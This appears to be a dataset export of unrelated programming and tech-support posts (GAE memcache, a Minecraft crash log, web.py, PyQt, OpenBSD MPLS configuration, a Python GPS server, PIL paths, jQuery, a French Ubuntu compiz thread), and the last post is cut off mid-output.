text
stringlengths
256
65.5k
I generate RSS feed with latest 10 records from GAE NDB datastore. Records in database are updated weekly. How can I avoid queries to datastore each time user requests RSS feed display? I.e. how to cache that? You can use memcache to avoid hitting the datastore every time. As you probably know queries are not cached in NDB. def get_data(): data = memcache.get('key') if data is not None: return data else: data = self.query_for_data() memcache.add('key', data, 60) return data So in other words, try to get your data from memcache and if it fails get it from the datastore then add it to memcache for next time round. The example above uses a 60 second timeout (the value 60 in the .add call) Simply leave that argument out to have the data persist as long as memcache allows. Also from a similar question: NDB Caching When Using Projected Queries So it appears if you get by key you'll automatically get from the NDB cache instead, if available, but I've not personally used that. So construct your RSS content and just before you render or it, save it to memcache. Then when you update the content it's created from simply invalidate the cached version (see docs) so the next request will get it from the datastore and you can then put it back in the cache.
I was trying to port forward my minecraft server, using port 25566, and for some reason it wasn't working. So, I opened minecraft to enter localhost, and after clicking login, the window closed and placed an error log report on my desktop. The same thing happens with all subsequent tries. Here is the error report: # # A fatal error has been detected by the Java Runtime Environment: # # EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x690ba2a1, pid=3152, tid=3372 # # JRE version: 6.0_26-b03 # Java VM: Java HotSpot(TM) Client VM (20.1-b02 mixed mode windows-x86 ) # Problematic frame: # C [atioglxx.dll+0x8a2a1] # # If you would like to submit a bug report, please visit: # http://java.sun.com/webapps/bugreport/crash.jsp # The crash happened outside the Java Virtual Machine in native code. # See problematic frame for where to report the bug. # --------------- T H R E A D --------------- Current thread (0x0200cc00): JavaThread "Minecraft main thread" daemon [_thread_in_native, id=3372, stack(0x4ef10000,0x4ef60000)] siginfo: ExceptionCode=0xc0000005, reading address 0x00000b54 Registers: EAX=0x00000000, EBX=0x4f31c778, ECX=0x00000000, EDX=0x00000000 ESP=0x4ef548a0, EBP=0x4ef561cc, ESI=0x00000000, EDI=0x00000001 EIP=0x690ba2a1, EFLAGS=0x00010212 Top of Stack: (sp=0x4ef548a0) 0x4ef548a0: 00000000 00000000 00000000 4f31c778 0x4ef548b0: 00000000 00000000 00000000 00000000 0x4ef548c0: 00000000 00000000 00000000 00000000 0x4ef548d0: 00000000 00000000 000000f5 00000000 0x4ef548e0: 00000000 00000000 00000000 00000000 0x4ef548f0: 00000000 00000000 00000000 00000000 0x4ef54900: 00000000 00000001 00000000 00000000 0x4ef54910: 00000000 00000000 4f1e9be8 0000000e Instructions: (pc=0x690ba2a1) 0x690ba281: 14 8d 43 10 50 8d 4c 24 1c 51 56 57 8d 7c 24 50 0x690ba291: e8 0a 21 04 00 8b 53 10 bf 01 00 00 00 89 43 08 0x690ba2a1: 39 ba 54 0b 00 00 0f 85 85 00 00 00 68 f8 bc f0 0x690ba2b1: 69 e8 07 0b d6 00 83 c4 04 85 c0 74 74 be bc 56 Register to memory mapping: EAX=0x00000000 is an unknown value EBX=0x4f31c778 is an unknown value ECX=0x00000000 is an unknown value EDX=0x00000000 is an unknown value ESP=0x4ef548a0 is pointing into the stack for thread: 0x0200cc00 EBP=0x4ef561cc is pointing into the stack for thread: 0x0200cc00 ESI=0x00000000 is an unknown value EDI=0x00000001 is an unknown value Stack: [0x4ef10000,0x4ef60000], sp=0x4ef548a0, free space=274k Native frames: (J=compiled Java code, j=interpreted, Vv=VM code, C=native code) C [atioglxx.dll+0x8a2a1] DrvPresentBuffers+0x3e821 Java frames: (J=compiled Java code, j=interpreted, Vv=VM code) j org.lwjgl.opengl.WindowsPeerInfo.nChoosePixelFormat(JIILorg/lwjgl/opengl/PixelFormat;Ljava/nio/IntBuffer;ZZZZ)I+0 j org.lwjgl.opengl.WindowsPeerInfo.choosePixelFormat(JIILorg/lwjgl/opengl/PixelFormat;Ljava/nio/IntBuffer;ZZZZ)I+15 j org.lwjgl.opengl.WindowsDisplay.createWindow(Lorg/lwjgl/opengl/DisplayMode;Ljava/awt/Canvas;II)V+176 j org.lwjgl.opengl.Display.createWindow()V+68 j org.lwjgl.opengl.Display.create(Lorg/lwjgl/opengl/PixelFormat;Lorg/lwjgl/opengl/Drawable;Lorg/lwjgl/opengl/ContextAttribs;)V+63 j org.lwjgl.opengl.Display.create(Lorg/lwjgl/opengl/PixelFormat;)V+9 j org.lwjgl.opengl.Display.create()V+13 j net.minecraft.client.Minecraft.a()V+135 j net.minecraft.client.Minecraft.run()V+6 j java.lang.Thread.run()V+11 v ~StubRoutines::call_stub --------------- P R O C E S S --------------- Java Threads: ( => current thread ) =>0x0200cc00 JavaThread "Minecraft main thread" daemon [_thread_in_native, id=3372, stack(0x4ef10000,0x4ef60000)] 0x0200d400 JavaThread "Timer hack thread" daemon [_thread_blocked, id=3368, stack(0x4ee80000,0x4eed0000)] 0x0200a800 JavaThread "Keep-Alive-Timer" daemon [_thread_blocked, id=3356, stack(0x4d490000,0x4d4e0000)] 0x0200c800 JavaThread "D3D Screen Updater" daemon [_thread_blocked, id=3256, stack(0x4e920000,0x4e970000)] 0x0200c000 JavaThread "DestroyJavaVM" [_thread_blocked, id=3160, stack(0x00360000,0x003b0000)] 0x0200b400 JavaThread "TimerQueue" daemon [_thread_blocked, id=3252, stack(0x4d650000,0x4d6a0000)] 0x0200b000 JavaThread "AWT-EventQueue-0" [_thread_blocked, id=3236, stack(0x4d520000,0x4d570000)] 0x0200a000 JavaThread "AWT-Windows" daemon [_thread_in_native, id=3204, stack(0x4ab70000,0x4abc0000)] 0x02009c00 JavaThread "AWT-Shutdown" [_thread_blocked, id=3200, stack(0x4aa00000,0x4aa50000)] 0x02009400 JavaThread "Java2D Disposer" daemon [_thread_blocked, id=3196, stack(0x4a940000,0x4a990000)] 0x02009000 JavaThread "Low Memory Detector" daemon [_thread_blocked, id=3188, stack(0x4a620000,0x4a670000)] 0x02015800 JavaThread "C1 CompilerThread0" daemon [_thread_blocked, id=3184, stack(0x4a590000,0x4a5e0000)] 0x02008800 JavaThread "Attach Listener" daemon [_thread_blocked, id=3180, stack(0x4a500000,0x4a550000)] 0x02008400 JavaThread "Signal Dispatcher" daemon [_thread_blocked, id=3176, stack(0x4a470000,0x4a4c0000)] 0x01fdf000 JavaThread "Finalizer" daemon [_thread_blocked, id=3172, stack(0x4a3e0000,0x4a430000)] 0x01fda400 JavaThread "Reference Handler" daemon [_thread_blocked, id=3168, stack(0x4a350000,0x4a3a0000)] Other Threads: 0x01fd5c00 VMThread [stack: 0x4a2c0000,0x4a310000] [id=3164] 0x0203c000 WatcherThread [stack: 0x4a6b0000,0x4a700000] [id=3192] VM state:not at safepoint (normal execution) This error has happened to other people before, but I haven't been able to find an actual answer to the problem. Minecraft + java have been reinstalled in all possible ways, video card drivers(radeon x600) have been changed, updated, everything. I have 4 gigabytes of ddr2 RAM and a pentium d 820, and windows 7 ultimate 64-bit. The answers in the other question like this on this site don't help at all. I say I was fiddling with minecraft server because that's the only thing I did that could have done anything to break minecraft. I was able to play minecraft beforehand. Minecraft for free and in-browser minecraft on minecraft.net don't work either. Minecraft server works perfectly though.
I have two web application: parent_app and sub_app say that, http://www.some.com/parent.png will be handled by parent_app. if it is refererd in another website, parent_app get a HTTP_REFERER, say that is http://www.other.com/path?query=value, I want a sub_app take this HTTP_REFERER's path and query_string as his own path and query_string, and return the result to parent_app, so ,parent_app's url won't be changed, the visitors brower won't get a 303 jump either. sub.py: import web class Sub(object): def GET(self): return web.input().query # I want it to be 'value', from "query=value" urls = (r'/path', 'Sub') sub_app = web.application(urls, locals()) parent.py: import web from sub import sub_app class Parent(object): def GET(self): return sub_app.request('/path?query=value').data #=========(1) urls = ( r'/parent.png', 'Parent', r'', sub_app ) parent_app = web.application(urls, locals()) and run: >>>python parent.py when I visit 'http://www.some.com/parent.png'? I get these errors: Traceback (most recent call last): File "/home/netroyal/Documents/program/studame/web/wsgiserver/__init__.py", line 1245, in communicate req.respond() File "/home/netroyal/Documents/program/studame/web/wsgiserver/__init__.py", line 775, in respond self.server.gateway(self).respond() File "/home/netroyal/Documents/program/studame/web/wsgiserver/__init__.py", line 2018, in respond response = self.req.server.wsgi_app(self.env, self.start_response) File "/home/netroyal/Documents/program/studame/web/httpserver.py", line 306, in __call__ return self.app(environ, xstart_response) File "/home/netroyal/Documents/program/studame/web/httpserver.py", line 274, in __call__ return self.app(environ, start_response) File "/home/netroyal/Documents/program/studame/web/application.py", line 279, in wsgi result = self.handle_with_processors() File "/home/netroyal/Documents/program/studame/web/application.py", line 249, in handle_with_processors return process(self.processors) File "/home/netroyal/Documents/program/studame/web/application.py", line 246, in process raise self.internalerror() File "/home/netroyal/Documents/program/studame/web/application.py", line 473, in internalerror parent = self.get_parent_app() File "/home/netroyal/Documents/program/studame/web/application.py", line 458, in get_parent_app if self in web.ctx.app_stack: AttributeError: 'ThreadedDict' object has no attribute 'app_stack' /home/netroyal/Documents/program/studame/web/ is the web.py package path. so, how can I make (1) running correctly? I want to get the same result like (1) runs in shell: >>> import web >>> class Sub(object): ... def GET(self): ... return web.input().query >>> urls = ('/path', 'Sub') >>> sub_app = web.application(urls, locals()) >>> sub_app.request('/path?query=value').data #=========(1)' 'value' >>> I know, I can use web.seeother('/path?query=value') to make visitors see the result, but I do not want the browser jump to another url. I think urllib2.urlopen('http://www.some.com/path?query=value') will work, but is there a better way to do it in a single request? thank you for any help!-----for reading this,too !==========================================Edit====================================== OK, after some code hacking, I solved a part of my problem: I add a simulation.py: import web, re class Simulation(object): def __init__(self, urls, fvars): self._urls = urls self._fvars = fvars def request(self, localpart='/', method='GET', data=None, host='0.0.0.0:8080', headers=None, https=False): #nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn # get path and args(parameters from new url) try: path, query = localpart.split('?', 1) except: path, query = (localpart, '') # get all arguments: args(parameters) parts = query.split('&') args = {} for part in parts: try: name, value = part.split('=') except: pass else: args[name] = value #uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu patterns = [self._urls[2*i] for i in range(0, len(self._urls)/2)] for i in range(0, len(patterns)): result = re.match(patterns[i], path) if result: web.input = lambda: web.storage(args) Worker = self._fvars[self._urls[2*i + 1]] return Worker().GET(*result.groups()) #---------------------------------------------------------------------------------------- raise web.notfound() and insub.py: from simulation import * class Sub(object): def GET(self): return web.input().query # I want it to be 'value', from "query=value" urls = (r'/path', 'Sub') sub_app = web.application(urls, locals()) sub_sim = Simulation(urls, locals()) # new class to run request in parent_app adn in parent.py: import web from sub import sub_app, sub_sim #sub_sim is new class Parent(object): def GET(self): return sub_sim.request('/path?query=value') # sub_app changed to sub_sim, and no (.data) urls = ( r'/parent.png', 'Parent', r'', sub_app ) parent_app = web.application(urls, locals()) and I can use '/sub' to visit sub_app too, keep it a standalone application. I solved my problem, not perfectly,but some kind of hard. I think I will just use it, when I have more time, I will find another way. if you have a better solution, please tell me, thanks. Best regards. ========================================= I feel like I was speaking to myself, where is people?
#!/usr/bin/python # -*- coding: utf-8 -*- import sys from PyQt4 import QtGui, QtCore class Example(QtGui.QMainWindow): def __init__(self): super(Example, self).__init__(); self.initUI() def initUI(self): field = QtGui.QLineEdit("", self) field.resize(field.sizeHint()) field.move(150, 100) submit_button = QtGui.QPushButton("Fill hello world", self) submit_button.resize(submit_button.sizeHint()) submit_button.move(50,300) submit_button.clicked.connect(self.modify(field)) def modify(self, field): field.setText("hello") def main(): #!/usr/bin/python # -*- coding: utf-8 -*- import sys from PyQt4 import QtGui, QtCore class Example(QtGui.QMainWindow): def __init__(self): super(Example, self).__init__(); self.initUI() def initUI(self): field = QtGui.QLineEdit("", self) field.resize(field.sizeHint()) field.move(150, 100) submit_button = QtGui.QPushButton("Fill hello world", self) submit_button.resize(submit_button.sizeHint()) submit_button.move(50,300) submit_button.clicked.connect(self.modify(field)) def modify(self, field): field.setText("hello") def main(): app = QtGui.QApplication(sys.argv) ex = Example() ex.show() sys.exit(app.exec_()) if __name__=='__main__': main() app = QtGui.QApplication(sys.argv) ex = Example() ex.show() sys.exit(app.exec_()) if __name__=='__main__': main() Ok. so here is what I want to do.Whenever the sumbit button is clicked, I want the field to be filled by 'hello world'. This would mean connecting the submit button to a user defined slot. How do I pass the field to the modify() function, where its text can be altered? Presently the code gives error: File "test.py", line 21, in initUI submit_button.clicked.connect(self.modify(field)) TypeError: connect() slot argument should be a callable or a signal, not 'NoneType'
A few months ago, I wrote a diff to simplify the calculation of ICMP extension header checksums in the OpenBSD kernel. It so happened that the code is only used by the OpenBSD MPLS subsystem. I didn’t have access to an OpenBSD-based MPLS network at the time, nor was I familiar with MPLS in general; so in the spirit of the OpenBSD hacker mantra “shut up and hack,” I set out to build a small MPLS test network to test my diff. :) This blog post documents my experience setting up the MPLS network; hopefully someone out there will find it useful. WARNING: I set up this network a few months ago and it’s very likelythat I have forgotten a bunch of details. Also shortly after I committedmy diff, one of the nodes in the network died from a powerbrownout/surge during a crazy thunderstorm and I haven’t had a chance torebuild the network. So most of this blog post is based on my notes andfuzzy memory. You’ve been warned! If you’re not familiar with OpenBSD’s implementation of MPLS, you’ll first need to read Claudio Jeker’s (claudio@) EuroBSDCon 2011 paper: Demystifying MPLS: The MPLS Framework in OpenBSD (PDF). I designed my small (tiny?) test network as a subset of Claudio’s example network (see page 6 of the PDF for a diagram of his network). To minimize variables, I used the exact same IP addresses and MPLS labels where possible. If you’re just getting your feet wet with MPLS on OpenBSD like I was, I suggest doing the same. Here’s how my simple four-node test network looked like: If you’re not familiar with MPLS terminology, P is Provider, and PE is Provider Edge. What they are is explained in the paper. :) The goal is to get the Customer at 192.168.237.4 talking to the IP address behind PE2 (192.168.237.242). By the way, if you feel like trying this out, I highly recommend using OpenBSD -current (or OpenBSD 5.4 when it is released in November 1, 2013); there were a bunch of ldpd(8) commits made at the t2k13 hackathon in June 2013 so it helps to be as up-to-date as possible. Customer Setup ifconfig rl0 192.168.237.4/28 route add default 192.168.237.2 PE1 Setup PE1 interface config: ifconfig em0 rdomain 1 ifconfig em0 192.168.237.2/28 route -T1 add default 192.168.237.1 ifconfig lo1 10.42.42.1/32 ifconfig em1 10.42.0.1/24 mpls ifconfig mpe0 rdomain 1 ifconfig mpe0 mplslabel 666 ifconfig mpe0 192.168.237.2/32 PE1 /etc/ospfd.conf: router-id 10.42.42.1 area 0.0.0.0 { interface em1 interface lo1 } PE1 /etc/ldpd.conf: router-id 10.42.42.1 interface em1 PE1 /etc/bgpd.conf: router-id 10.42.42.1 AS 3.10 rdomain 1 { descr "CUSTOMER1" rd 3.10:1 import-target rt 3.10:1 export-target rt 3.10:1 depend on mpe0 network inet connected network 0.0.0.0/0 } group ibgp { announce IPv4 unicast announce IPv4 vpn remote-as 3.10 local-address 10.42.42.1 neighbor 10.42.42.2 { descr PE2 } } PE2 Setup PE2 interface config: ifconfig rl0 rdomain 1 ifconfig rl0 192.168.237.242/28 ifconfig lo1 10.42.42.2/32 ifconfig rl1 10.42.6.2/24 mpls ifconfig mpe0 rdomain 1 ifconfig mpe0 mplslabel 666 ifconfig mpe0 192.168.237.242/32 PE2 /etc/ospfd.conf: router-id 10.42.42.2 area 0.0.0.0 { interface rl1 interface lo1 } PE2 /etc/ldpd.conf: router-id 10.42.42.2 interface rl1 PE2 /etc/bgpd.conf: router-id 10.42.42.2 AS 3.10 rdomain 1 { descr "CUSTOMER1" rd 3.10:1 import-target rt 3.10:1 export-target rt 3.10:1 depend on mpe0 network inet connected } group ibgp { announce IPv4 unicast announce IPv4 vpn remote-as 3.10 route-reflector local-address 10.42.42.2 neighbor 10.42.42.1 { descr PE1 } } P1 Setup P1 interface config: ifconfig lo1 10.42.21.1/32 ifconfig fxp2 10.42.0.2/24 mpls ifconfig fxp3 10.42.6.1/24 mpls sysctl net.inet.ip.forwarding=1 P1 /etc/ospfd.conf: router-id 10.42.21.1 area 0.0.0.0 { interface fxp2 interface fxp3 interface lo1 } P1 /etc/ldpd.conf: router-id 10.42.21.1 interface fxp2 interface fxp3 Putting it all together Now that all the config files are in place, it’s time to start up the daemons and give the network a whirl. At this point, I really wish I still have the test network so that I can provide specific instructions on starting the daemons and confirming that they work as expected. But I do recall an important bit of information. The daemons need to be started in this order: (1) ospfd, (2) ldpd, and (3) bgpd. (see the end of Claudio’s misc@ post). So if I recall correctly, this is what I did: Set up the network as above. Start ospfd on PE1, P1, and PE2. Test that PE1 and ping P1 and P1 can ping PE2. Start ldpd on PE1, P1, and PE2. Start bgpd on PE1 and PE2. If all goes well, the Customer system should now be able to access the IP address behind PE2 (192.168.237.242) over the MPLS network. If I ever set up the test network again, I’ll update this blog post with more specific details.
I am new at python, currently I am working on a GPS tracker with that interacts with Google maps using an Arduino Uno. I am getting this error and it is not letting me run the .py script for my tcpServer this is the whole script. #!/usr/bin/env python import socket import MySQLdb TCP_IP = 'my machine IP' TCP_PORT = 32000 BUFFER_SIZE = 40 # ClearDB. Deletes the entire tracking table def ClearDB(curs,d ): curs.execute (""" INSERT INTO gmaptracker (lat, lon) VALUES (0.0,0.0)""") d.commit() # Connect to the mySQL Database def tServer(): try: db = MySQLdb.connect (host = "my host", user = "my user", passwd = "my password", db = "gmap" ) except MySQLdb.Error, e: print "Error %d: %s" %(e.args[0], e.args[1]) sys.exit(1); cursor = db.cursor() # Start with a fresh tracking table ClearDB(cursor,db) # Set up listening Socket try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((TCP_IP, TCP_PORT)) print "Listening...." s.listen(1) conn, addr = s.accept() print 'Accepted connection from address:', addr except socket.error (message): if s: s.close() print "Could not open socket: " + message cursor.close() conn.close() db.close() sys.exit(1) try: while 1: data = conn.recv(BUFFER_SIZE) if not data:break str1,str2 = data.split("Long: ") str1 = str1.split("Lat: ")[1] latitude = float(str1) longitude = float(str2) cursor.execute (""" INSERT INTO gmaptracker (lat, lon) VALUES (%s,%s)""", (latitude,longitude)) db.commit() except KeyboardInterrupt: ClearDB(cursor,db); cursor.close() conn.close() db.close() if __name__ == '__main__': tServer() and this is the error that I am getting Traceback (most recent call last): File "tcpServer.py", line 79, in <module> tServer() File "tcpServer.py", line 48, in tServer except socket.error(message): NameError: global name 'message' is not defined If anyone can help me figure this out I would greatly appreciate it, as I said I am new at python I am also running python 2.7 if that helps. Thanks in advance
I want to load an image but I get an error-message. My code: from PIL import Image im = Image.open("D:\Python26\PYTHON-PROGRAMME\bild.jpg") im.show() I get this error: Traceback (most recent call last): File "D:\Python26\PYTHON-PROGRAMME\00000000000000000", line 2, in <module> im = Image.open("D:\Python26\PYTHON-PROGRAMME\bild.jpg") File "D:\Python26\lib\site-packages\PIL\Image.py", line 1888, in open fp = __builtin__.open(fp, "rb") IOError: [Errno 22] invalid mode ('rb') or filename: 'D:\\Python26\\PYTHON-PROGRAMME\x08ild.jpg'
JavaScript iamjustoneman — 2011-12-20T18:02:28-05:00 — #1 Hi all, I have work thumbnails on one side (meals), ingredients on the other side, what I would like to do is: 1) If I hover over a meal, the ingredients used for that dish are highlighted on the left 2) If I hover over an ingredient, the dishes that used this ingredient are selected I am just starting out in jQuery, can anyone give me some pointers. Many thanks system — 2011-12-20T18:07:04-05:00 — #2 1) How do you want the associated images highlighted? How you code it up depends on it. 2) How are the dishes selected, check boxes, radio buttons or something else? 3) Why use jquery when you can do it with less code running with just normal javascript? I assume you are aware jquery is just a set javascript functions. iamjustoneman — 2011-12-20T18:17:12-05:00 — #3 Hi there Max, 1) Each image will have a heading (the meal name), when not highlighted, the background of the title will be white, when it is highlighted it will be black. 2) The dishes are selected via hovering over over the meal name in a list 3) Sure, I myself and beginning to learn jQuery, I'm more of a designer than developer, so the my few first couple of tutorials are quite promising, it makes sense to me, I guess this little exercise has come a little to soon, if someone can help no doubt I will learn along the way. In short, jQuery was chosen because it looks quite friendly for a non-tecky newbie. system — 2011-12-20T18:19:13-05:00 — #4 In any case you could set up an array something like this var mealsData = [ ['meal1','ingr1','ingr2','ingr3','ingr4','ingr5','ingr6'], ['meal2','ingr7','ingr2','ingr3','ingr8','ingr9'] ]; and then depending on whether a meal or ingredient is hovered on, you loop through the appropriate part of the array to get the info for the images you need to highlight or select on the other side. iamjustoneman — 2011-12-20T18:23:02-05:00 — #5 Hi Max, Thanks for the help, I'm learning about arrays, thanks for the pointers, don't suppose you would be willing to whip up a very basic demo, cheeky i know, I just can't find any demo's to learn from. I know I just start learning all this from scratch, I just seem to learn more from examples system — 2011-12-20T18:29:29-05:00 — #6 I find that very hard to believe. Try any of these examples.
Anarcheon Perte d'éléments suite à utilisation de compiz Bonjour à tous, Utilisateur relativement récent d'Ubuntu (<1 an), j'ai voulu faire mumuse avec compiz. J'essaie d'installer le cube et quelques autres "décorations", mais finis par me rendre compte que c'était aussi bien avant, et que j'irai bidouiller un peu plus tard, quand j'aurais plus de temps ^^ Je trouve un bouton "Remettre les valeurs par défaut" (ou quelque chose dans ce goût là), et là...c'est le drame. Mon ordi se met à tourner de façon...importante ^^ J'ai dû partir faire autre chose, je me dis que je le laisse tourner et que je reviendrai plus tard, quand il aura fini de faire tous ses petits calculs. 1h30 plus tard, retour sur mon ordi, et je le retrouve comme je l'avais laissé : des fenêtres blanches ouvertes un peu partout, plus de barre avec mes logiciels sur la gauche, et plus de barre de menu en haut des fenêtres. Seule différence : je peux bouger ma souris, mais je n'ai nul part ou cliquer. Je finis par éteindre l'ordinateur à la sauvage, et je le rallume. Arrivé sur le bureau, toujours pas de barre à gauche. J'ai un document sans extension et un dossier sur mon bureau, je peux les ouvrir et les éditer, mais pas de barre de menu en haut (ni celle avec le croix, le tiret (réduire) et le cadre (plein écran), ni celle avec Fichier, Edition, etc...) Le bouton "Windows" ne me permet pas d'ouvrir le menu et d'ouvrir de nouveaux logiciels, du coup je n'ai pas accès à ma console ou à compiz (ou en tout cas je n'ai pas trouvé comment y avoir accès. J'ai pensé les ouvrir depuis l'explorateur de fichier en allant chercher directement à la source, mais ne les aient pas trouvés). Je suis présentement sur ma session d'invité, qui elle marche parfaitement bien. Ah oui, je tourne sous Ubuntu 13.10. Vous avez des idées sur comment je pourrais réparer tout ça ? Merci d'avance Anar PS : J'espère être dans la bonne section, je m'en excuse si ce n'est pas le cas Dernière modification par Anarcheon (Le 30/03/2014, à 16:56) Hors ligne nam1962 Re : Perte d'éléments suite à utilisation de compiz Il faut peut être désinstaller compiz pour commencer. sudo apt-get remove --purge compiz Puis après donne nous ton sudo apt-get update Si tu veux t'amuser avec ton bureau, je te conseille plutôt Xubuntu pour te faire la main et un passage dans le tuto des ma signature - plus tard tu pourras aussi tester Kubuntu (perso ai toujours trouvé KDE trop compliqué, mais des gouts et des couleurs...) Mon tuto pour optimiser / finaliser une install : http://forum.ubuntu-fr.org/viewtopic.ph … #p15041961 Xubuntu 14.10 sur portable, 14.04 sur fixe, 14.04 chez mes amis. Score : 49 convertis IRL (leur ai pas donné le choix, aussi...). Un jeune site que j'aime bien, qui fait du T-shirt la nouvelle élégance ...bio en plus : http://goudronblanc.com Hors ligne Anarcheon Re : Perte d'éléments suite à utilisation de compiz Bonsoir nam, Le problème, c'est que je n'ai pas accès au terminal Pas de barre sur la gauche, et lorsque je clique sur le bouton "windows", rien ne s'affiche et je ne peux donc pas chercher le terminal. Je regarderai ton tuto plus en détail alors, dès que j'aurais réparé tout ça ^^ Hors ligne fouduroi Re : Perte d'éléments suite à utilisation de compiz ctrl+alt+t pour ouvrir un terminal ubuntu 13.04 64 bits / ubuntu 14.04 64 bits / asus p6t, core i7 920, 7go ram, nvidia gt220 http://www.pullco.fr/ association pour la Promotion de l’Utilisation des Logiciels Libres en COrrèze Hors ligne Anarcheon Re : Perte d'éléments suite à utilisation de compiz Merci fouduroi Bon alors après suppression de compiz, le problème apparait aussi sur ma session d'invité... Sinon, voici le résultat de la commande : Ign http://extras.ubuntu.com saucy InRelease Ign http://archive.canonical.com saucy InRelease Ign http://security.ubuntu.com saucy-security InRelease Ign http://fr.archive.ubuntu.com saucy InRelease Atteint http://extras.ubuntu.com saucy Release.gpg Ign http://fr.archive.ubuntu.com saucy-updates InRelease Atteint http://archive.canonical.com saucy Release.gpg Atteint http://security.ubuntu.com saucy-security Release.gpg Ign http://fr.archive.ubuntu.com saucy-backports InRelease Atteint http://extras.ubuntu.com saucy Release Atteint http://archive.canonical.com saucy Release Atteint http://security.ubuntu.com saucy-security Release Atteint http://fr.archive.ubuntu.com saucy Release.gpg Atteint http://extras.ubuntu.com saucy/main Sources Atteint http://archive.canonical.com saucy/partner i386 Packages Atteint http://fr.archive.ubuntu.com saucy-updates Release.gpg Atteint http://security.ubuntu.com saucy-security/main Sources Atteint http://extras.ubuntu.com saucy/main i386 Packages Atteint http://fr.archive.ubuntu.com saucy-backports Release.gpg Atteint http://security.ubuntu.com saucy-security/restricted Sources Atteint http://fr.archive.ubuntu.com saucy Release Atteint http://fr.archive.ubuntu.com saucy-updates Release Atteint http://security.ubuntu.com saucy-security/universe Sources Atteint http://fr.archive.ubuntu.com saucy-backports Release Atteint http://security.ubuntu.com saucy-security/multiverse Sources Atteint http://fr.archive.ubuntu.com saucy/main Sources Atteint http://fr.archive.ubuntu.com saucy/restricted Sources Atteint http://security.ubuntu.com saucy-security/main i386 Packages Atteint http://fr.archive.ubuntu.com saucy/universe Sources Atteint http://fr.archive.ubuntu.com saucy/multiverse Sources Atteint http://security.ubuntu.com saucy-security/restricted i386 Packages Atteint http://fr.archive.ubuntu.com saucy/main i386 Packages Atteint http://security.ubuntu.com saucy-security/universe i386 Packages Atteint http://fr.archive.ubuntu.com saucy/restricted i386 Packages Atteint http://security.ubuntu.com saucy-security/multiverse i386 Packages Atteint http://fr.archive.ubuntu.com saucy/universe i386 Packages Atteint http://fr.archive.ubuntu.com saucy/multiverse i386 Packages Atteint http://security.ubuntu.com saucy-security/main Translation-en Atteint http://fr.archive.ubuntu.com saucy/main Translation-fr Atteint http://fr.archive.ubuntu.com saucy/main Translation-en Ign http://archive.canonical.com saucy/partner Translation-fr_FR Ign http://extras.ubuntu.com saucy/main Translation-fr_FR Atteint http://fr.archive.ubuntu.com saucy/multiverse Translation-fr Ign http://archive.canonical.com saucy/partner Translation-fr Ign http://extras.ubuntu.com saucy/main Translation-fr Atteint http://fr.archive.ubuntu.com saucy/multiverse Translation-en Atteint http://security.ubuntu.com saucy-security/multiverse Translation-en Ign http://extras.ubuntu.com saucy/main Translation-en Ign http://archive.canonical.com saucy/partner Translation-en Atteint http://fr.archive.ubuntu.com saucy/restricted Translation-fr Atteint http://fr.archive.ubuntu.com saucy/restricted Translation-en Atteint http://fr.archive.ubuntu.com saucy/universe Translation-fr Atteint http://fr.archive.ubuntu.com saucy/universe Translation-en Atteint http://security.ubuntu.com saucy-security/restricted Translation-en Atteint http://fr.archive.ubuntu.com saucy-updates/main Sources Atteint http://fr.archive.ubuntu.com saucy-updates/restricted Sources Atteint http://fr.archive.ubuntu.com saucy-updates/universe Sources Atteint http://fr.archive.ubuntu.com saucy-updates/multiverse Sources Atteint http://security.ubuntu.com saucy-security/universe Translation-en Atteint http://fr.archive.ubuntu.com saucy-updates/main i386 Packages Atteint http://fr.archive.ubuntu.com saucy-updates/restricted i386 Packages Atteint http://fr.archive.ubuntu.com saucy-updates/universe i386 Packages Atteint http://fr.archive.ubuntu.com saucy-updates/multiverse i386 Packages Atteint http://fr.archive.ubuntu.com saucy-updates/main Translation-fr Atteint http://fr.archive.ubuntu.com saucy-updates/main Translation-en Atteint http://fr.archive.ubuntu.com saucy-updates/multiverse Translation-fr Atteint http://fr.archive.ubuntu.com saucy-updates/multiverse Translation-en Atteint http://fr.archive.ubuntu.com saucy-updates/restricted Translation-fr Atteint http://fr.archive.ubuntu.com saucy-updates/restricted Translation-en Atteint http://fr.archive.ubuntu.com saucy-updates/universe Translation-fr Atteint http://fr.archive.ubuntu.com saucy-updates/universe Translation-en Atteint http://fr.archive.ubuntu.com saucy-backports/main Sources Atteint http://fr.archive.ubuntu.com saucy-backports/restricted Sources Atteint http://fr.archive.ubuntu.com saucy-backports/universe Sources Atteint http://fr.archive.ubuntu.com saucy-backports/multiverse Sources Atteint http://fr.archive.ubuntu.com saucy-backports/main i386 Packages Atteint http://fr.archive.ubuntu.com saucy-backports/restricted i386 Packages Atteint http://fr.archive.ubuntu.com saucy-backports/universe i386 Packages Atteint http://fr.archive.ubuntu.com saucy-backports/multiverse i386 Packages Atteint http://fr.archive.ubuntu.com saucy-backports/main Translation-en Atteint http://fr.archive.ubuntu.com saucy-backports/multiverse Translation-en Atteint http://fr.archive.ubuntu.com saucy-backports/restricted Translation-en Ign http://security.ubuntu.com saucy-security/main Translation-fr_FR Ign http://security.ubuntu.com saucy-security/main Translation-fr Atteint http://fr.archive.ubuntu.com saucy-backports/universe Translation-en Ign http://security.ubuntu.com saucy-security/multiverse Translation-fr_FR Ign http://security.ubuntu.com saucy-security/multiverse Translation-fr Ign http://security.ubuntu.com saucy-security/restricted Translation-fr_FR Ign http://security.ubuntu.com saucy-security/restricted Translation-fr Ign http://security.ubuntu.com saucy-security/universe Translation-fr_FR Ign http://security.ubuntu.com saucy-security/universe Translation-fr Ign http://fr.archive.ubuntu.com saucy/main Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy/multiverse Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy/restricted Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy/universe Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/main Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/multiverse Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/restricted Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-updates/universe Translation-fr_FR Ign http://fr.archive.ubuntu.com saucy-backports/main Translation-fr_FR Ign http://fr.archive.ubuntu.com 